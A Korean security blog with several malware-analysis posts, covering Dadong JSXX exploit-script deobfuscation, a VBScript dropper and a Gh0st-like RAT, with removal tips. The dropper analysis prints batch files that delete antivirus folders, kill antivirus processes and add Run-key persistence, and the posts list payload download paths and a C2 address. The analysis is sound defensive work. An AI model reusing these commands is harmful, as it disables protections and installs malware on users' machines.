Encrypt By Dadong's JSXX 0.41 VIP 이란 주석을 가지고 있는 자바스크립트 악성 코드가 근래 들어 많이 보인다고 한다.

샘플 : 

(해당 샘플을 사용하고 생기는 책임은 모두 다운로드 받는 본인에게 있다는 걸 명심하세요, 비밀번호 : virus)

중국에서 만든 난독화 코드인데 dadong을 거꾸로 하면 gondad가 되는데 이는 중국어로 공격이라는 뜻이란다.

해당 난독화 코드는 사실 난독화를 풀지 않고도 분석이 가능하다.

해당 글에서는 해당 악성코드를 해결하는 두가지 방법을 제시 할 것이다.

하나는 아주 간단하게 쉘코드만을 얻어와 쉘코드 분석을 통해 추가적으로 어떠한 행동을 하는지 파악하는 방법이고 또 하나 방법은 난독화 코드 자체를 해독하는 방법이다.

일단은 난독화 코드 자체를 해독하는 방법부터 알아보자.

[난독화 코드 해독 방법]
샘플 코드는 아래와 같이 생겼다.

[그림 1 - 샘플 html 파일 윗 부분]

 [그림 2 - 샘플 html 파일 아랫 부분]

[그림 3 - i.js 파일 코드]
 
[그림 2] 부분이 실제 난독화 코드 부분이고 [그림 1]은 midi 취약점에 관련된 부분이다. 빨간 박스 부분에 주석이 보이는데 이 주석 때문에 dadong 난독화 스크립트라고 부른다.

일단 엄청나게 숫자가 많은 부분은 실제 어떠한 행위를 하는 코드 부분이고, 그 다음부터 이어지는 코드들이 어떠한 행위를 하는 코드를 해독하여 주는 부분이다. 해당 코드를 임의로 정렬 해 보았다.

[그림 4 - 난독화 코드 복호화 수행 코드 임의 정렬]

딱 봐도 엄청나게 보기가 복잡하다. 하지만 차근차근 보다보면 해당 코드가 어떻게 복호화 되는지 알 수 있는데, 소스를 한줄씩 분석하다 보면 1번 박스 코드에서 현재 코드(난독화 코드를 풀어주는 복호화 수행 코드)들을 아스키 값으로 변환하여 모두 더하는 것을 볼 수 있다. 그리고 2번 박스에서 아스키값들을 모두 더해 저장한 변수를 key 값으로 사용하여 xor 연산등을 통해 어떠한 행위를 하는 코드를 복호화 해 주는 것을 볼 수 있으며 3번 박스에서 그 코드를 실행하는 것을 볼 수 있다.
복호화 된 코드를 보기 위해 alert나 document.write를 이용하면 되는데 여기서 주의해야 할 점이 있다.
key로 현재 코드들의 아스키 값 총합을 사용하기 때문에 이 총합이 틀려지면 key 값도 달라져 복호화 결과 또한 달라지게 된다. 그렇기에 3번 박스에 있는 KDRhr0 이 함수와 아스키값이 동일한 어떠한 함수를 정의해 줘야 한다. KDRhr0 와 아스키값이 동일하려면 r0==162 라는 조건을 충족하는 다른 아스키 조합을 찾으면 된다. 기본적으로 r 자리는 +1 증가를 시켜주고, 0자리는 1 감소 시켜주면 된다. 필자는 m5 라는 값을 사용 하였다. 아래와 같이 수정을 하게 되면 복호화 코드가 나타나게 된다.

[그림 5 - 복호화 코드 수정]

KDRhm5 = alert 이 부분은 직접 alert 코드를 대입하기 위하여 임의로 정의한 부분이고 아래 박스 부분은 alert가 적용되게 끔 함수 이름을 변경 시켜 준 것이다. 위 코드를 실행하게 되면 아래와 같이 나온다.

 [그림 6 - 난독화 해독 결과]

난독화가 해독되었으나 아직은 완벽하게 된 것은 아니다. 아래에 있는 몇가지 줄로 인해 위에 있는 쉘코드가 정렬, 치환되고 실행이 된다. 그 과정은 글이 너무 길어지므로 생략하겠다. 대부분 i.js 파일에 있는 변수들로 인해 치환된다.

또 쉘코드 분석은 나머지 방법 소개하고 그 뒷부분에서 공통적으로 이어가겠다.

참고자료 : http://www.kahusecurity.com/2012/chinese-pack-using-dadongs-jsxx-vip-script/ 


[쉘코드 바로 얻는 방법]
대부분의 악성코드들은 unescape를 하는데 해당 난독화 코드의 쉘코드 또한 unescape를 사용한다. 이 부분을 alert로 바꾸어주게 되면 난독화가 해제되고 쉘코드를 unescape 하는 과정에서 alert를 만나 unescape 하기 전 쉘코드를 보여주게 된다. i.js 파일에 unescape를 정의 해 놓은 변수가 있는데 이 부분을 alert로 변경하여 주면 된다.

 [그림 7 - unescape 되기 전 쉘코드]

첫번째 방법에서 치환되고 정렬된 결과와 동일하다. 그러나 아직 UCS2 문자가 있기 때문에 이 문자들을 hex 값으로 바꾸어 주어야 한다.

[그림 8 - UCS2 값 변경 방법]

변경하고 shellcode2exe를 이용하여 exe 파일로 만들고 올리디버거로 열어 분석하다보면 아래와 같은 부분을 볼 수 있다.

[그림 9 - XOR 연산 수행 부분]

사실 프로그램을 실행하면 무언가 동작은 하지만 분석을 해보면 그다지 하는 행동이 없어 보인다. 코드를 보면 다시 한번 XOR 연산으로 복호화를 수행 하는걸 알 수 있는데 이 또한 malzila에서 가능하다. XOR 코드를 보면 key 값은 0xBD 인 것을 알 수 있다.

 [그림 10 - XOR 복호화 수행]

복호화를 하게 되면 또다른 hex 값들이 나온다. 이 값들을 아래와 같이 확인해보면 추가적인 행위를 파악 할 수 있다.
 

 [그림 11 - 쉘코드 분석]

제일 마지막에 어떠한 URL이 있고 그 URL을 통해 어떠한 exe 파일을 받는 것을 알 수 있다.

 * 참고 : 현재는 해당 주소에 접속이 되지 않고 해당 주소를 검색하면 악성파일 유포지 인 것을 쉽게 확인 할 수 있다.

  1. 트라 2012.05.26 23:42

    역시 마제스트님 이군요 ^^ 만약 i.js 참조 하는부분이 없는 코드면 alert 부분을 어떻게 매칭시켜야 될까요? 다똥 0.41 구해서 보는데 오늘 하루 말렸네요 ㅠㅠ

    • Favicon of https://maj3sty.tistory.com BlogIcon MaJ3stY 2012.05.27 20:10 신고

      음 여러가지 방법이 생각나는데 이건 모두 구조에 따라 다 달라지는 방법들뿐이네요 ㅠㅠ...

      아무래도 소스를 봐야 할듯 ㅎㅎ 아무리 난독화 코드라고 하더라도 결국은 풀리는 곳이 있으니 시간만 있으면 충분히 해결하실거라 생각이 드네요 ^^

너무너무 궁금해서 결국 분석환경에서 간단히 어떠한 동작을 하는지 보았다.

온라인 게임 계정탈취 악성코드는 아닌듯 하고,  200~으로 시작하는 파일이 Alcrm32.exe파일을 Drop해 실행시킨다.

또, logo09.exe파일은 레지스트리 중 Ahnlab Tray 레지스트리에 자신을 등록하게 삭제 된다.

나머지 파일 하나는 그냥 백도어 프로그램 이다.. 

 그리고 나서 200~ 파일은 인터넷 접속을 시도 하고, site/main/b.txt를 받으려고 하나 해당 사이트에서 조치가 취해졌는지 파일이 없어 다운받지 못하고 404 페이지만 서버로부터 받는다.


[그림 1 - 패킷 스트림 모습]
 
해당 사이트는 현재 공사중이라고 표시되고 b.txt 파일은 다운로드 되지 않으므로 주소를 공개한다.

과연 저 b.txt파일에는 뭐가 들어있을까? ㅋㅋ 

  1. 2013.05.11 20:37

    비밀댓글입니다

네이버 지식인 모니터링 중 어떤 질문자가 다급하게 링크를 올리며 질문을 했던 적이 있었다(SIS 공부 기간에)

네이트온 쪽지로 이상한 URL이 왔다고 알아봐 달라는 질문 이었다.

바로 URL로 들어가니 어떠한 파일을 다운받는 링크가 나왔고 다운 받으니 word.vbe라는 VB Script 파일이었다.

네이트온 쪽지로 왔으니 악성코드가 맞는 것은 100% 일 것!!

하지만, 그때는 공부중이어서 분석을 하지 못했고, 오늘에서야 분석을 하게 되었다.

분석시간이 너무 걸려 중간에 그만 뒀지만 그래도 공부는 됬을거라 생각 된다.

바이러스 토탈로 검사 해 본 결과로는 많은 AV에서 탐지하지 못하고 있다는 것이다.

바이러스 토탈에서 이 악성코드를 탐지하는 AV는 4개정도밖에 없었다.


인증샷을 보여주고 싶지만, 현재 바이러스 토탈이 무슨 문제인지 접속이 되질 않는다.. ㅠㅠ

일단 해당 악성코드를 실행하면 아래와 같은 동작을 한다.

 


[그림 1 - 실행 실패]
무언가 파일들을 실행하려 하지만 실행이 되지 않는다. 

처음에는 분석환경이 실행조건에 맞지 않아서 그런 줄 알았으나, 알고보니 파일들이 0바이트 였다...

아무런 코드도 없는 쓰레기 파일들이었다.

그리고 PE로 프로세스를 보니 ping 프로세스가 실행되어 있었다. 자세히 보니 루프백으로 ping을 10개 날리고 있었다.

그 다음으로는 아무런 동작도 하지 않는 것처럼 조용하다.... 그러나 프로그램은 아래와 같은 파일들을 생성한다.

[그림 2 - 생성 파일들]

[생성파일]


C:\WINDOWS\help\wincari.exe                            // 쓰레기 파일

C:\time.txt                                                            // 로컬컴퓨터의 날짜와 시간을 저장하는 텍스트 파일

C:\WINDOWS\Web\ver.exe                                  // 쓰레기 파일

C:\WINDOWS\system32\winfacet.exe                   // 쓰레기 파일

C:\WINDOWS\system32\Alcrm32.exe                   // 확인 불가...

C:\WINDOWS\v.bat                                              // 쓰레기 파일들을 실행시키는 등에 행위를 하는 배치파일

C:\WINDOWS\va.bat                                            // 알약AV와 V3AV를 디버깅 하도록 명령을 내리는 배치파일


아래는 위에서 생성된 v.bat 파일과 va.bat 파일의 내용이다.


[v.bat]


%systemroot%\Web\ver.exe                                   // ver.exe 실행

%systemroot%\system32\winfacet.exe                    //  winfacet.exe 실행

del "%ProgramFiles%\ESTsoft\*.*" /f /s /q               // ESTosft 하위 폴더와 파일 모두 강제 삭제


del "%ProgramFiles%\AhnLab\*.*" /f /s /q               // AhnLab 하위 폴더와 파일 모두 강제 삭제


ping 127.0.0.1 -n 10>nul                                            // 화면에 보이지 않게 nul로 출력

reg add HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /v MyRun /d  %systemroot%\system32\Alcrm32.exe /f               // 레지스트리에 Alcrm32.exe 등록

date <c:\time.txt

del c:\time.txt

del %systemroot%\v.bat                                         // 모든 작업을 끝마치고 자신을 삭제


===============================================================================================================


[va.bat]


tasklist | findstr "V3LSvc.exe" && ntsd -c q -pn V3LSvc.exe                   // V3 프로세스르 찾은 뒤 디버깅

tasklist | findstr "V3LSvc.exe" && ntsd -c q -pn V3LSvc.exe

tasklist | findstr "AYServiceNT.aye" && ntsd -c q -pn AYServiceNT.aye  // 알약 프로세스를 찾은 뒤 디버깅 


해당 악성코드는 아래와 같은 레지스트리 변경작업을 실행한다.

[레지스트리 변경 항목]


HKLM\SYSTEM\CurrentControlSet\Service\SharedAccess\Start
old value : 2
New Value : 3
 

HKLM\SYSTEM\CurrentControlSet\Service\SharedAccess\Epoch\Epoch
Old Value : 32
New Value : 33
 

HKLM\SYSTEM\ControlSet001\Service\SharedAccess\Start
Old Value : 2
New Value : 3
 

HKLM\SYSTEM\ControlSet001\Service\SharedAccess\Epoch\Epoch
Old Value : 32
New Value : 33
 

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\RefCount
Old Value : 2
New Value : 1
 

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Run
Old Value : 5
New Value : 7
 

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Run\ver.exe
실행결과 : ver.exe 레지스트리 등록


HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Run\MyRunC:\WINDOWS\system32\Alcrm32.exe 실행결과 : Alcrm32.exe 레지스트리 등록
 

HKLM\SOFTWARE\Microsoft\WBEM\CIMON
Old Value : 44
New Value : 47
 

HKLM\SOFTWARE\Microsoft\WBEM\CIMONHKLM\SOFTWARE\Microsoft\WBEM\CIMON\Merger Throttling Threshold

실행결과 : Merger Throttling Threshold 생성 후 value 10으로 설정
 

HKLM\SOFTWARE\Microsoft\WBEM\CIMON\Merger Release Threshold
실행결과 : Merger Release Threshold 생성 후 value 5로 설정
 

HKLM\SOFTWARE\Microsoft\WBEM\CIMON\Merger Batching Threshold 생성 후 value 131072로 설정
실행결과 : Merger Batching Threshold 생성 후 value 131072로 설정
 

HKLM\SOFTWARE\Microsoft\Rpc\UuidSequenceNumber
Old Value : -522910999
New Value : -522910998

 

HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed value 수정
실행결과 : Seed Value 수정


해당 악성코드는 아래와 같이 서비스도 수정한다.

[Drirver]
 

IP Network Address Translator(NAT) 기능 Stop                       // NAT 기능 OFF

Microsoft Kernel Wave Audio Mixer 기능 Stop



[Win32]


Application Layer Gateway Service 기능 Stop                          // OSI 7계층 서비스 게이트웨이 서비스 OFF

Windows Firewall/Internet Connection Sharing(ICS) 기능 Stop   // 방화벽, 공유 기능 OFF


이 모든 행동과 함께 인터넷이 연결되어 있다면 아래와 같이 특정 사이트에서 파일을 다운로드 한다.

[악성파일 추가 다운로드 - 아직도 다운로드가 가능하므로 주소는 모두 공개 하지 않음]

jrcrxxxx.co.kr(211.xxx.111.xxx) /%69%6D%61%67%65%73/%62%61%6E%6E%65%72/%6C%6F%67%6F%73%77%69%73%68.%6A%70%67   (/images/banner/logoswish.jpg)


www.heavexxxx.co.kr(116.xxx.158.xxx) /%73%68%6F%70/%69%6D%67/%6D%61%69%6E/%6C%6F%67%6F%30%39.%67%69%66   (/shop/img/main/logo09.gif)


jjknew.firsxxxxx.kr(121.xxx.114.xxx) /%70%61%72%74%6E%65%72/%65%73%65%6C%6C%65%72%73/%74%6D%70/%32%30%30%38%31%30%30%32%31%36%34%38%62%39%39.%67%69%66   (/partner/esellers/tmp/200810021648b99.gif)

패킷을 캡쳐해서 보면 URL 인코딩으로 되어 있는데 그것을 복호화하면 ()안에 주소가 나온다. 


하지만 내 노트북에서는 노튼이 알아서 다 처리해주어... backtrack5에서 wget으로 수동으로 다운로드 하였다.


[그림 3 - jrcrxxxx.co.kr에서 다운 받는 모습]


[그림 4 - jjknew.firsxxxxx.kr에서 다운 받는 모습]


[그림 5 - www.heavexxxxx.co.kr에서 다운 받는 모습]

이미지에서 볼수 있듯이 받는 파일들은 확장자만 이미지파일 확장자 일뿐, 실제로는 윈도우 exe 파일들이다.

어떠한 악위적인 행위를 하는지는 분석을 여기서 중단하여 모른다.(다시 이 파일들을 분석 환경으로 옴기고 등등을 하기가 너무 귀찮네요... ㅠㅠ)

한시라도 빨리 모든 백신에 치료패턴이 추가 되었으면 한다.

[+] 해당 악성코드 샘플을 얻고 싶으신 백신업체 관계자 분들은 연락주시면 바로 쏴드립니다. ^^


(2011. 12. 14 추가) - 바이러스 토탈 결과
AntivirusVersionLast UpdateResult
AhnLab-V3 2011.12.12.00 2011.12.12 -
AntiVir 7.11.19.98 2011.12.13 -
Antiy-AVL 2.0.3.7 2011.12.13 -
Avast 6.0.1289.0 2011.12.13 VBS:Agent-MC [Trj]
AVG 10.0.0.1190 2011.12.13 JS/Heur
BitDefender 7.2 2011.12.14 -
ByteHero 1.0.0.1 2011.12.07 -
CAT-QuickHeal 12.00 2011.12.13 -
ClamAV 0.97.3.0 2011.12.13 -
Commtouch 5.3.2.6 2011.12.13 -
Comodo 10947 2011.12.14 UnclassifiedMalware
DrWeb 5.0.2.03300 2011.12.13 -
Emsisoft 5.1.0.11 2011.12.13 Virus.JS.Heur!IK
eSafe 7.0.17.0 2011.12.13 -
eTrust-Vet 37.0.9622 2011.12.13 -
F-Prot 4.6.5.141 2011.12.13 -
F-Secure 9.0.16440.0 2011.12.13 -
Fortinet 4.3.388.0 2011.12.13 -
GData 22 2011.12.13 VBS:Agent-MC
Ikarus T3.1.1.109.0 2011.12.13 Virus.JS.Heur
Jiangmin 13.0.900 2011.12.13 -
K7AntiVirus 9.119.5671 2011.12.13 -
Kaspersky 9.0.0.837 2011.12.13 HEUR:Exploit.Script.Generic
McAfee 5.400.0.1158 2011.12.13 -
McAfee-GW-Edition 2010.1E 2011.12.13 -
Microsoft 1.7903 2011.12.13 -
NOD32 6709 2011.12.13 -
Norman 6.07.13 2011.12.13 -
nProtect 2011-12-13.01 2011.12.13 -
Panda 10.0.3.5 2011.12.13 -
PCTools 8.0.0.5 2011.12.14 -
Prevx 3.0 2011.12.14 -
Rising 23.88.01.02 2011.12.13 -
Sophos 4.72.0 2011.12.13 -
SUPERAntiSpyware 4.40.0.1006 2011.12.14 -
Symantec 20111.2.0.82 2011.12.14 -
TheHacker 6.7.0.1.356 2011.12.11 -
TrendMicro 9.500.0.1008 2011.12.13 -
TrendMicro-HouseCall 9.500.0.1008 2011.12.14 -
VBA32 3.12.16.4 2011.12.13 -
VIPRE 11249 2011.12.14 -
ViRobot 2011.12.13.4823 2011.12.13 -
VirusBuster 14.1.114.0 2011.12.13 -
Additional information
MD5   : 136014f57b25249e60fb4ce1dc74e1dc
SHA1  : 4efec04d655b3c641c2cd21525175549395e1e1a
SHA256: b95635c202835fffea89c28f20d15eb94770b5b041d201439ff4f9ebf7e591fa
ssdeep: 96:f7BCqrj4UWUzDqNfY9RynI7I/7qTRzPYyCtZ01TkCGfhwHYBIIJPC80u6u:TAqrGsGYvoI7E
76zVOjWYBIIPC8X
File size : 4862 bytes
First seen: 2011-12-11 08:24:20
Last seen : 2011-12-13 23:47:16
 

네이버 지식인을 둘러보던 중 어떤 질문자가 네이트온 쪽지 악성코드 다운로드 URL을 링크 시켜놨길래 언능 받아 분석을 해보았다.

 VirusTotal로 보니 벌써 일부 백신에서는 감지를 하고 있는 파일이었다.

 
그래도 오랜만에 분석도 해볼겸 VM에 구축해놓은 환경으로 옴긴 뒤 분석을 시도 하였다.

악성코드 파일에 기본 정보

 
Ghost Security라는 보안회사로 속이고 있다. 어이가 없을 뿐.

파일에 행동과, 코드를 보기 위해 Filemon, OllyDBG를 켜놓은 상태에서 해당 악성코드 파일을 실행했을 때 아래와 같은 이미지에 경고 문구가 등장하면서 실행이 되지 않는다.

OllyDBG 켜놓았을 때
 

 FileMon 켜놓았을 때
 
대부분의 글씨가 깨져서 알아볼수는 없지만(어차피 중국어니까 못알아보는) 대충 이해했을 때 FileMon/RegMon, OllyDBG가 켜져있다고 화를 내는거 같다.

안티 코드가 들어있는 듯!

파일이 원하는대로 모두 종료하고 파일을 실행시키면 특정 서비스를 레지스트리에 등록시킨 후 해당 파일을 제거 된다.


서비스 등록된 화면

 Process Explorer로 보면 아래와 같이 위 이미지에 이상한 문자열로 서비스를 등록시켜 아래와 같은 svchosts.exe 파일로 실행시킨다.

 서비스 구동 화면
 
 해당 서비스가 어떠한 네트워크 동작을 하고 있는지 TCPView로 확인환 결과 
 204.45.118.114:6464에 연결되어있다.
 

특정서버에 연결 확인 화면
 
와이어샤크로 어떠한 패킷이 오고가는지 확인한 결과 
Gh0st 라는 문자열이 보내어지는데 왜 보내지고 받는지는 알 수 없었다.

 

보내어지는 패킷 내용
 

* 해당 악성코드 수동 치료 방법!

1. 아래 이미지와 같이 등록되어 있는 서비스를 '사용안함'으로 설정!



2. 위 Path 수동 삭제!

3. 악성코드가 생성한 레지스트리 수동 삭제!(아래는 악성코드가 생성한 레지스트리) 



4. 변경된 기존 레지스트리를 다시 원상복구하기 위해 수정!
   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess

   변경 전 : Start = 4
   변경 후 : Start = 3 
   
변경 전 : Type = 20

   변경 후 : Type = 110


   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\RouterManagers\Ip

   변경 전 : %SystemRoot%\System32\iprtrmgr.dll

   변경 후 : C:\XXXXXXXX.dll
   ※ XXXXX : 랜덤한 숫자.

5. 완전한 치료를 위해 각 컴퓨터에 사용중인 백신으로 정밀검사 실시! 


오랜만에 재밌는 분석해서 기분이 좋다!

악성코드 샘플을 많이 얻을 수 있다면 얼마나 좋을까~

  1. Favicon of http://blog.naver.com/taiga800 BlogIcon 타이가 2011.12.01 02:14

    뭔가 많이 흥미롭군요.

  2. Favicon of http://0xffffffff.tistory.com BlogIcon Z1ke 2012.01.18 14:56 신고

    짱개산 RAT 한종류네여 ^^ 와샥에서 패킷 내보내는것은 감염을 알리는 health check 의 일종일듯 싶네요 ^^

    • Favicon of https://maj3sty.tistory.com BlogIcon MaJ3stY 2012.01.18 19:31 신고

      아 감염을 알리는... 그럴수도 있겠네요 ㅎㅎ

      엄청난 고수시군요 :)

인터넷 뉴스를 보던 중..


 
아x경x 뉴스 사이트에 들어갔을 때 이러한  메시지를 크롬으로부터 받았다.

상세한 정보를 봤더니...

 
꽤나 상세하게 리포팅을 해주었다.

크롬 사용한지는 얼마안됐지만, 사용하면 할수록 속도나 여러 측면에서 좋은 브라우저 같다.

역시 크롬!!! 

'[+] Security > [-] ETC' 카테고리의 다른 글

클라우드 보안과 디지털 포렌식  (2) 2012.07.17
난 이래서 크롬이 좋다!  (0) 2011.11.14
[TIP] 파이어폭스 사용시 주의사항  (0) 2011.10.08
엄청 쉬운 문제.  (7) 2009.10.27
BackTrack4 대략적인 모습.  (2) 2009.02.19

+ Recent posts